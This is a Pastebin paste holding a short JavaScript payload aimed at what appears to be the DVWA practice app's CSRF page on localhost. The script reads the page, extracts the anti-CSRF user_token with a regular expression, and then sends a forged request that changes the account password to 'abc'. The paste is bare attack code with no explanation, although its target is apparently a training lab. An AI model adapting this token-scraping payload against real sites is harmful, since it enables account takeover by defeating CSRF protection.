Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- var http = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("Microsoft.XMLHTTP");
- http.open("GET","https://127.0.0.1/vulnerabilities/csrf/", false)
- http.send()
- var text = http.responseText;
- console.log(text)
- var matches = /name='user_token' value='(.*)'/.exec(text);
- var token = matches[1]
- console.log(token)
- var http2 = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("Microsoft.XMLHTTP");
- http2.open("GET","https://127.0.0.1/vulnerabilities/csrf/?password_new=abc&password_conf=abc&Change=Change&user_token=" + token, false)
- http2.send()
- console.log(http2.responseText)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement